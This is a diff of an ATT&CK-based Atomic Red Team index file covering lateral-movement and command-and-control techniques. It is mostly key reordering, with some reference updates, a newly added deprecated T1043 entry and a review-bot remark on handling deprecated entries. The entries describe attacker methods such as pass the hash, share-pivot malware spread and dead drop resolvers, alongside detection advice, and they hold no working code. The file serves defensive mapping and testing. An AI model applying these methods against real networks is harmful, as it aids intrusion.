+ name: SMB/Windows Admin Shares
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1021.002
@@ -42346,23 +43786,6 @@ lateral-movement:
WMI Persistence. Retrieved October 11, 2019.
url: https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96
source_name: Medium Detecting WMI Persistence
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: SMB/Windows Admin Shares
- description: |-
- Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
-
- SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Adversaries may use SMB to interact with file shares, allowing them to move laterally throughout a network. Linux and macOS implementations of SMB typically use Samba.
-
- Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include `C$`, `ADMIN$`, and `IPC$`. Adversaries may use this technique in conjunction with administrator-level [Valid Accounts](https://attack.mitre.org/techniques/T1078) to remotely access a networked system over SMB,(Citation: Wikipedia Server Message Block) to interact with systems using remote procedure calls (RPCs),(Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), [Service Execution](https://attack.mitre.org/techniques/T1569/002), and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). Adversaries can also use NTLM hashes to access administrator shares on systems with [Pass the Hash](https://attack.mitre.org/techniques/T1550/002) and certain configuration and patch levels.(Citation: Microsoft Admin Shares)
- id: attack-pattern--4f9ca633-15c5-463c-9724-bdcd54fde541
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: lateral-movement
- modified: '2020-03-23T21:16:02.812Z'
- created: '2020-02-11T18:25:28.212Z'
x_mitre_platforms:
- Windows
x_mitre_is_subtechnique: true
@@ -42520,24 +43943,24 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T23:43:46.977Z'
created: '2020-02-11T18:27:15.774Z'
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_system_requirements:
+ - An SSH server is configured and running.
+ x_mitre_data_sources:
+ - Authentication logs
+ - Process use of network
+ - Network protocol analysis
+ - Netflow/Enclave netflow
x_mitre_detection: Use of SSH may be legitimate depending on the environment
and how it’s used. Other factors, such as access patterns and activity that
occurs after a remote login, may indicate suspicious or malicious behavior
with SSH. Monitor for user accounts logged into systems they would not normally
access or access patterns to multiple systems over a relatively short period
of time.
- x_mitre_data_sources:
- - Authentication logs
- - Process use of network
- - Network protocol analysis
- - Netflow/Enclave netflow
- x_mitre_system_requirements:
- - An SSH server is configured and running.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
atomic_tests: []
T1563.001:
technique:
@@ -42578,12 +44001,13 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T23:11:24.682Z'
created: '2020-02-25T18:34:38.290Z'
- x_mitre_contributors:
- - Anastasios Pingios
- x_mitre_data_sources:
- - Authentication logs
- x_mitre_system_requirements:
- - SSH service enabled, trust relationships configured, established connections
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_permissions_required:
+ - root
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
x_mitre_detection: Use of SSH may be legitimate, depending upon the network
environment and how it is used. Other factors, such as access patterns and
activity that occurs after a remote login, may indicate suspicious or malicious
@@ -42591,13 +44015,12 @@ lateral-movement:
not normally access or access patterns to multiple systems over a relatively
short period of time. Also monitor user SSH-agent socket files being used
by different users.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - root
- x_mitre_platforms:
- - Linux
- - macOS
+ x_mitre_system_requirements:
+ - SSH service enabled, trust relationships configured, established connections
+ x_mitre_data_sources:
+ - Authentication logs
+ x_mitre_contributors:
+ - Anastasios Pingios
atomic_tests: []
T1051:
technique:
@@ -42636,21 +44059,21 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-30T13:56:55.356Z'
created: '2017-05-31T21:30:46.047Z'
- x_mitre_platforms:
- - Windows
- x_mitre_system_requirements:
- - Shared webroot directory on remote system
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
x_mitre_detection: Use file and process monitoring to detect when files are
written to a Web server by a process that is not the normal Web server process
or when files are written outside of normal administrative time periods. Use
process monitoring to identify normal processes that run on the Web server
and detect processes that are not typically executed.
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: true
+ x_mitre_system_requirements:
+ - Shared webroot directory on remote system
+ x_mitre_platforms:
+ - Windows
atomic_tests: []
T1072:
technique:
@@ -42677,17 +44100,16 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-02-21T16:31:32.789Z'
created: '2017-05-31T21:30:57.201Z'
- x_mitre_contributors:
- - Shane Tully, @securitygypsy
- x_mitre_remote_support: true
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
+ x_mitre_data_sources:
+ - Authentication logs
+ - File monitoring
+ - Third-party application logs
+ - Windows Registry
+ - Process monitoring
+ - Process use of network
+ - Binary file metadata
x_mitre_detection: "Detection methods will vary depending on the type of third-party
software or system and how it is typically used. \n\nThe same investigation
process can be applied here as with other potentially malicious activities
@@ -42706,16 +44128,17 @@ lateral-movement:
application deployment at regular times so that irregular deployment activity
stands out. Monitor process activity that does not correlate to known good
software. Monitor account login activity on the deployment system."
- x_mitre_data_sources:
- - Authentication logs
- - File monitoring
- - Third-party application logs
- - Windows Registry
- - Process monitoring
- - Process use of network
- - Binary file metadata
- x_mitre_version: '2.0'
- x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
+ x_mitre_remote_support: true
+ x_mitre_contributors:
+ - Shane Tully, @securitygypsy
atomic_tests: []
T1080:
technique:
@@ -42726,7 +44149,7 @@ lateral-movement:
Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
- A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1023) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1158). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)
+ A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)
Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.
external_references:
@@ -42746,26 +44169,26 @@ lateral-movement:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-02-12T20:27:07.764Z'
+ modified: '2020-03-31T22:14:56.107Z'
created: '2017-05-31T21:31:01.759Z'
- x_mitre_version: '1.2'
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_contributors:
- - Michal Dida, ESET
- - David Routin
+ x_mitre_is_subtechnique: false
+ x_mitre_system_requirements:
+ - Access to shared folders and content with write permissions
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
x_mitre_detection: |-
Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.
Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_system_requirements:
- - Access to shared folders and content with write permissions
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Michal Dida, ESET
+ - David Routin
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ x_mitre_version: '1.2'
atomic_tests: []
T1550:
technique:
@@ -42815,14 +44238,10 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-24T12:36:24.608Z'
created: '2020-01-30T16:18:36.873Z'
- x_mitre_platforms:
- - Windows
- - Office 365
- - SaaS
- x_mitre_data_sources:
- - Office 365 audit logs
- - OAuth audit logs
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - System Access Controls
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
Audit Policy) Look for suspicious account behavior across systems that share
@@ -42834,10 +44253,14 @@ lateral-movement:
account. Correlate other security systems with login information (e.g., a
user has an active login session but has not entered the building or does
not have VPN access).'
- x_mitre_defense_bypassed:
- - System Access Controls
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - OAuth audit logs
+ - Authentication logs
+ x_mitre_platforms:
+ - Windows
+ - Office 365
+ - SaaS
atomic_tests: []
T1021.005:
technique:
@@ -42863,22 +44286,22 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-23T20:41:21.147Z'
created: '2020-02-11T18:28:44.950Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_detection: Use of VNC may be legitimate depending on the environment
- and how it’s used. Other factors, such as access patterns and activity that
- occurs after a remote login, may indicate suspicious or malicious behavior
- with VNC.
+ x_mitre_system_requirements:
+ - VNC server installed and listening for connections.
x_mitre_data_sources:
- Process use of network
- Network protocol analysis
- Netflow/Enclave netflow
- x_mitre_system_requirements:
- - VNC server installed and listening for connections.
+ x_mitre_detection: Use of VNC may be legitimate depending on the environment
+ and how it’s used. Other factors, such as access patterns and activity that
+ occurs after a remote login, may indicate suspicious or malicious behavior
+ with VNC.
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1550.004:
technique:
@@ -42913,24 +44336,39 @@ lateral-movement:
phase_name: lateral-movement
modified: '2020-03-24T12:36:24.501Z'
created: '2020-01-30T17:48:49.395Z'
- x_mitre_platforms:
- - Office 365
- - SaaS
- x_mitre_contributors:
- - Johann Rehberger
- x_mitre_data_sources:
- - Office 365 audit logs
- - Authentication logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - System Access Controls
x_mitre_detection: Monitor for anomalous access of websites and cloud-based
applications by the same user in different locations or by different systems
that do not match expected configurations.
- x_mitre_defense_bypassed:
- - System Access Controls
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Office 365 audit logs
+ - Authentication logs
+ x_mitre_contributors:
+ - Johann Rehberger
+ x_mitre_platforms:
+ - Office 365
+ - SaaS
atomic_tests: []
T1021.006:
technique:
+ created: '2020-02-11T18:29:47.757Z'
+ modified: '2020-03-25T12:25:03.014Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: lateral-movement
+ type: attack-pattern
+ id: attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65
+ description: |-
+ Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
+
+ WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)
+ name: Windows Remote Management
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1021.006
@@ -42947,21 +44385,6 @@ lateral-movement:
url: https://medium.com/threatpunter/detecting-lateral-movement-using-sysmon-and-splunk-318d3be141bc
description: French, D. (2018, September 30). Detecting Lateral Movement Using
Sysmon and Splunk. Retrieved October 11, 2019.
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Windows Remote Management
- description: |-
- Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
-
- WinRM is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services).(Citation: Microsoft WinRM) It may be called with the `winrm` command or by any number of programs such as PowerShell.(Citation: Jacobsen 2014)
- id: attack-pattern--60d0c01d-e2bf-49dd-a453-f8a9c9fa6f65
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: lateral-movement
- modified: '2020-03-25T12:25:03.014Z'
- created: '2020-02-11T18:29:47.757Z'
x_mitre_platforms:
- Windows
x_mitre_is_subtechnique: true
@@ -43145,16 +44568,15 @@ lateral-movement:
command-and-control:
T1071:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- external_references:
- - source_name: mitre-attack
- external_id: T1071
- url: https://attack.mitre.org/techniques/T1071
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
+ created: '2017-05-31T21:30:56.776Z'
+ modified: '2020-03-27T19:02:44.772Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Application Layer Protocol
description: "Adversaries may communicate using application layer protocols
to avoid detection/network filtering by blending in with existing traffic.
Commands to the remote system, and often the results of those commands, will
@@ -43163,15 +44585,16 @@ command-and-control:
transferring files, electronic mail, or DNS. For connections that occur internally
within an enclave (such as those between a proxy or pivot node and other nodes),
commonly used protocols are SMB, SSH, or RDP. "
- name: Application Layer Protocol
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-27T19:02:44.772Z'
- created: '2017-05-31T21:30:56.776Z'
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1071
+ url: https://attack.mitre.org/techniques/T1071
+ - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ source_name: University of Birmingham C2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
@@ -43227,37 +44650,32 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-30T00:37:16.593Z'
created: '2020-03-16T15:48:33.882Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)
+
+ In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
x_mitre_data_sources:
- Process monitoring
- Process use of network
- Malware reverse engineering
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: |-
- SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)
-
- In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1102.002:
technique:
- external_references:
- - source_name: mitre-attack
- external_id: T1102.002
- url: https://attack.mitre.org/techniques/T1102/002
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Bidirectional Communication
+ created: '2020-03-14T22:34:03.024Z'
+ modified: '2020-03-26T23:15:47.861Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4
description: "Adversaries may use an existing, legitimate external Web service
as a means for sending commands to and receiving output from a compromised
system over the Web service channel. Compromised systems may leverage popular
@@ -43273,13 +44691,18 @@ command-and-control:
Using common services, such as those offered by Google or Twitter, makes it
easier for adversaries to hide in expected noise. Web service providers commonly
use SSL/TLS encryption, giving adversaries an added level of protection. "
- id: attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-26T23:15:47.861Z'
- created: '2020-03-14T22:34:03.024Z'
+ name: Bidirectional Communication
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1102.002
+ url: https://attack.mitre.org/techniques/T1102/002
+ - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ source_name: University of Birmingham C2
x_mitre_platforms:
- Linux
- macOS
@@ -43303,6 +44726,58 @@ command-and-control:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
atomic_tests: []
+ T1043:
+ technique:
+ id: attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Commonly Used Port
+ description: "**This technique has been deprecated. Please use [Non-Standard
+ Port](https://attack.mitre.org/techniques/T1571) where appropriate.**\n\nAdversaries
+ may communicate over a commonly used port to bypass firewalls or network detection
+ systems and to blend with normal network activity to avoid more detailed inspection.
+ They may use commonly open ports such as\n\n* TCP:80 (HTTP)\n* TCP:443 (HTTPS)\n*
+ TCP:25 (SMTP)\n* TCP/UDP:53 (DNS)\n\nThey may use the protocol associated
+ with the port or a completely different protocol. \n\nFor connections that
+ occur internally within an enclave (such as those between a proxy or pivot
+ node and other nodes), examples of common ports are \n\n* TCP/UDP:135 (RPC)\n*
+ TCP/UDP:22 (SSH)\n* TCP/UDP:3389 (RDP)"
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1043
+ url: https://attack.mitre.org/techniques/T1043
+ - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ source_name: University of Birmingham C2
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ revoked: false
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ modified: '2020-07-06T17:54:28.071Z'
+ created: '2017-05-31T21:30:42.657Z'
+ x_mitre_deprecated: true
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_network_requirements: true
+ x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
+ sending significantly more data than it receives from a server). Processes
+ utilizing the network that do not normally have network communication or have
+ never been seen before are suspicious. Analyze packet contents to detect communications
+ that do not follow the expected protocol behavior for the port that is being
+ used. (Citation: University of Birmingham C2)'
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ - Process use of network
+ - Process monitoring
+ x_mitre_version: '1.0'
+ atomic_tests: []
T1092:
technique:
id: attack-pattern--64196062-5210-42c3-9a02-563a0d1797ef
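Review bot: The new `T1043` entry carries `x_mitre_deprecated: true` together with `revoked: false` and an empty `atomic_tests: []`, so anything that walks this index to compute coverage or to pick techniques will count a technique ATT&CK has retired unless it filters on `x_mitre_deprecated`. If this file is regenerated from the ATT&CK export (the wholesale key reordering in the surrounding hunks suggests it is), the generator is the place to either drop deprecated entries or document that consumers must skip them. The description already points to T1571 as the replacement, so a one-line generator or README note such as `# entries with x_mitre_deprecated: true are kept for ID stability; skip them when reporting coverage` would make the intent explicit. The same `x_mitre_deprecated: true` flag appears on the T1051 entry in the earlier hunk ending at `T1072:`.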
@@ -43326,19 +44801,20 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2019-07-16T20:53:20.583Z'
+ modified: '2020-07-14T19:44:50.871Z'
created: '2017-05-31T21:31:09.379Z'
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - File monitoring
- - Data loss prevention
- x_mitre_detection: Monitor file access on removable media. Detect processes
- that execute when removable media is mounted.
- x_mitre_network_requirements: false
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
- Windows
+ x_mitre_network_requirements: false
+ x_mitre_detection: Monitor file access on removable media. Detect processes
+ that execute when removable media is mounted.
+ x_mitre_data_sources:
+ - File monitoring
+ - Data loss prevention
+ x_mitre_version: '1.0'
atomic_tests: []
T1071.004:
technique:
@@ -43381,10 +44857,14 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-27T19:02:44.600Z'
created: '2020-03-15T16:27:31.768Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_contributors:
+ - Jan Petrov, Citi
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: |-
+ Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)
+
+ Monitor for DNS traffic to/from known-bad or suspicious domains.
x_mitre_data_sources:
- DNS records
- Netflow/Enclave netflow
@@ -43392,14 +44872,10 @@ command-and-control:
- Process use of network
- Netflow/Enclave netflow
- Packet capture
- x_mitre_detection: |-
- Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)
-
- Monitor for DNS traffic to/from known-bad or suspicious domains.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Jan Petrov, Citi
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1071.004
atomic_tests:
- name: DNS Large Query Volume
@@ -43559,17 +45035,17 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-27T20:54:28.287Z'
created: '2020-03-11T14:56:34.154Z'
+ x_mitre_data_sources:
+ - DNS records
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_detection: Detection for this technique is difficult because it would
+ require knowledge of the specific implementation of the port calculation algorithm.
+ Detection may be possible by analyzing DNS records if the algorithm is known.
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_detection: Detection for this technique is difficult because it would
- require knowledge of the specific implementation of the port calculation algorithm.
- Detection may be possible by analyzing DNS records if the algorithm is known.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - DNS records
atomic_tests: []
T1132:
technique:
@@ -43607,28 +45083,28 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-14T23:39:50.338Z'
created: '2017-05-31T21:31:43.540Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Itzik Kotler, SafeBreach
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_network_requirements: true
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2)'
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Process monitoring
- - Network protocol analysis
- x_mitre_network_requirements: true
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Itzik Kotler, SafeBreach
+ x_mitre_version: '1.1'
atomic_tests: []
T1001:
technique:
@@ -43658,27 +45134,44 @@ command-and-control:
phase_name: command-and-control
modified: '2020-03-15T00:40:27.670Z'
created: '2017-05-31T21:30:18.931Z'
- x_mitre_version: '1.1'
- x_mitre_data_sources:
- - Packet capture
- - Process use of network
- - Process monitoring
- - Network protocol analysis
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_network_requirements: true
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2)'
- x_mitre_network_requirements: true
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Packet capture
+ - Process use of network
+ - Process monitoring
+ - Network protocol analysis
+ x_mitre_version: '1.1'
atomic_tests: []
T1102.001:
technique:
+ created: '2020-03-14T22:24:21.841Z'
+ modified: '2020-03-26T23:12:30.499Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7
+ description: |-
+ Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
+
+ Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+
+ Use of a dead drop resolver may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
+ name: Dead Drop Resolver
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
